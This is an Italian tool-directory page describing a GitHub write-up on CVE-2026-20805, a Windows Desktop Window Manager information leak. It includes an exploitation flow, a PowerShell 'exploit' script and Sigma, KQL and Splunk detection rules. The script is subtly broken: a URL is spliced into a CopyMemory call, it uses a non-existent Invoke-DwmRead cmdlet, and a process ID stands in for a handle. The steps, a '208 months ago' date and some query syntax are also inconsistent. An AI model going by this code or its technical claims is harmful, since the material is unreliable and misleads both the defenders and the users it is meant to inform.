Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805: Una vulnerabilità di Windows Desktop Window Manager che causa la divulgazione locale di informazioni. Richiede privilegi bassi, nessuna interazione con l'utente. Valutata CVSS 5.5 (Media). Sfruttata attivamente ed elencata nel CISA KEV; patch rilasciata a gennaio 2026. | Kitploit
Strumenti/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Analisi delle VulnerabilitàExploitRaccolta InformazioniApprendimento e FormazioneRisposta agli Incidenti
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

Vedi Repository
208 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE‑2026‑20805: Una vulnerabilità di Windows Desktop Window Manager che causa la divulgazione locale di informazioni. Richiede privilegi bassi, nessuna interazione con l'utente. Valutata CVSS 5.5 (Media). Sfruttata attivamente ed elencata nel CISA KEV; patch rilasciata a gennaio 2026.

Condividi

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Una vulnerabilità di Windows Desktop Window Manager che causa divulgazione locale di informazioni. Richiede privilegi bassi, nessuna interazione con l'utente. Valutata CVSS 5.5 (Media). Sfruttata attivamente e inclusa nel catalogo CISA KEV; patch rilasciata a gennaio 2026.

Inside CVE 2026 20805: Come una vulnerabilità DWM di Windows ha esposto dati sensibili

1 Sintesi esecutiva

CVE 2026 20805 è una vulnerabilità di divulgazione di informazioni nel Desktop Window Manager (DWM) – il componente principale che renderizza il desktop, compone le finestre e accelera l'interfaccia utente basata su GPU.
Perché è importante: la vulnerabilità consente a un attaccante locale con privilegi bassi di leggere dati che dovrebbero essere confinati ad altre sessioni o processi.

Attributi tecnici chiave

AttributoValore
CWE‑200: Esposizione di informazioni sensibili a un attore non autorizzato✓
Vettore di attaccoLocale
Privilegi richiestiBassi
Interazione con l'utenteNessuna
Impatto – riservatezzaAlto
Impatto – integritàNessuno
Impatto – disponibilitàNessuno
Punteggio base CVSS 3.15.5 (Media)

2 Comprendere il Desktop Window Manager

DWM orchestra la memoria GPU, i buffer delle finestre e le superfici UI inter-processo. È un obiettivo di alto valore perché aggrega dati da più processi in uno spazio GPU condiviso; una vulnerabilità qui può far trapelare credenziali o dati di sessione tra utenti.

Ruolo di DWM in Windows moderno:

  1. Riceve gli aggiornamenti di visualizzazione dal compositor.
  2. Alloca memoria GPU per ogni finestra.
  3. Gestisce la composizione accelerata dalla GPU, consentendo transizioni visive fluide e supporto multi-monitor.

3 Analisi tecnica di CVE 2026 20805

Prerequisiti dell'attacco

  • Attaccante locale con privilegi bassi, nessuna interazione con l'utente richiesta.
  • La vulnerabilità viene attivata quando DWM non riesce a validare gli offset nella tabella dei buffer delle finestre prima di copiare i dati nella memoria GPU.

Come si applica CWE‑200

La vulnerabilità sfrutta la mancanza di controlli sui limiti dell'indice del buffer della finestra; ciò consente a un attaccante di leggere la memoria GPU adiacente e ottenere segreti memorizzati da altri processi.

Versioni interessate

In base all'elenco CPE del NVD, Windows 10.0.19041 (e derivate) sono interessati.

4 Percorsi di sfruttamento

Di seguito è riportato un flusso di sfruttamento concettuale:

  1. L'attaccante ottiene un handle al processo DWM tramite CreateProcess con privilegi minimi.
  2. L'attaccante crea un indice che punta a uno slot di memoria GPU adiacente.
  3. Il buffer creato viene copiato nella routine di composizione delle finestre di DWM, unendo dati da altre sessioni.
  4. L'attaccante legge il dump di memoria GPU risultante ed estrae informazioni sensibili.

Codice di sfruttamento – script PowerShell

# Windows 10.0.19041 – DWM buffer read exploit
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # crafted offset to adjacent GPU memory
$targetWindow = 0x00030001    # target window index

# Create a temporary buffer in kernel space
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/main/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copy kernel buffer into DWM's composition routine
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Dump the exposed data to a local file for analysis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

Lo script dimostra come un attaccante può sfruttare la memoria GPU di DWM per leggere dati nascosti.


5. Ingegneria del rilevamento

Il rilevamento per CVE‑2026‑20805 si concentra sull'identificazione di interazioni anomale con dwm.exe e telemetria GPU insolita. Lo sfruttamento si basa sulla lettura di buffer di memoria supportati dalla GPU utilizzando offset creati ad hoc, quindi i difensori dovrebbero monitorare le deviazioni dal normale comportamento del Desktop Window Manager.

Fonti di telemetria pertinenti

  • Sysmon
    • Event ID 1 (ProcessCreate)
    • Event ID 10 (HandleOpen)
  • Eventi GPU ETW
    • Event ID 0x2B (DisplayUpdate)
  • Registri eventi di Windows
    • Applicazione
    • Sistema

Queste fonti forniscono visibilità sulla creazione dei processi, sull'accesso agli handle e sull'attività di aggiornamento della GPU.

Modelli sospetti

  1. Eventi CreateProcess ripetuti che coinvolgono dwm.exe, soprattutto quando il processo padre non è explorer.exe.
  2. Eventi DisplayUpdate (0x2B) ad alta frequenza seguiti da letture di memoria che utilizzano dimensioni o offset di buffer insoliti.
    • Esempio di valori sospetti:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Correlazione tra eventi HandleOpen che hanno come target dwm.exe e raffiche di attività GPU ETW.

Regola in stile Sigma

title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Accesso sospetto agli handle di dwm.exe

SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Creazione di processi inattesa che ha come target DWM

Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Picco di eventi DisplayUpdate GPU

Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Correlazione: HandleOpen seguito da attività GPU

let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Processi non standard che aprono handle su dwm.exe

index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Eventi CreateProcess inattesi per dwm.exe

index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Picco di DisplayUpdate GPU

index=windows EventCode=43
| timechart span=1m count
| where count > 50

Correlazione: HandleOpen e attività GPU

handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

Scarica lo strumento